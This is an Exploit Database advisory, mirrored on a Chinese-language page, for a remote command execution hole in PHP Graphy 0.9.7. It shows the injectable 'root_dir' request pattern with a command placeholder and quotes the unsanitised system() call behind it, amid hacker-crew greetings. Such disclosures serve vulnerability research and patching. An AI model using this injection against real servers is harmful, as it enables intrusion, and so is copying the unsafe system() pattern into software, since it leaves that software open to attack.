PHP Graphy 0.9.7 – ‘index.php’ Remote Command Execution

• Exploit Database
• 14 阅读

• 作者： Sn!pEr.S!Te Hacker
  日期： 2010-05-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12719/

• # ----------------------oOO---(_)---OOo-----------------------
  # | __ __ |
  # | _____/ /_____ ______/ /_ __ ______ ______ |
  # | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
  # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
  # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
  # | Security Sn!pEr.S!Te /____/ 2o1o |
  # ------------------------------------------------------------
  Remote Command Execution Vulnerability
  # ------------------------------------------------------------
  --------------------------------------------------------------
  PHP Graphy <== 0.9.7 (index.php)
  
  --------------------------------------------------------------
  #[+] Author : Sn!pEr.S!Te Hacker #
  # [+] Email : sniper-site@HoTMaiL.coM #
  # [+] T34M Sn!pEr.S!Te Hacker #
  # [+] 24-5-2010 #
  # [+] Script : lmage »PHP Graphy#
  # [+] Download:http://sourceforge.net/projects/phpgraphy/files/phpgraphy/0.9.7/phpgraphy-0.9.7.tar.gz/download #
  # Version: [0.9.7] #
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
  
  Exploit : phpgraphy-0.9.7\index.php
  
  http://localhost/phpgraphy-0.9.7/index.php?root_dir=[your command]
  
  http://127.0.0.1/phpgraphy-0.9.7/index.php?root_dir=[your command]
  
  
  system("cat \"".$root_dir.$display."_comment\"");
  
  line : 791
  
  web site Favorites my : http://inj3ct0r.com/ & http://www.hack0wn.com/ & http://www.exploit-db.com
  
  ================== Greetz : all my friend ===================
  * PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * saleh Hacker * ALhal alsab |
  * HitLer.3rb * QAHER ALRAFDE * DjHacker * Mr.JLD* Mr.koka |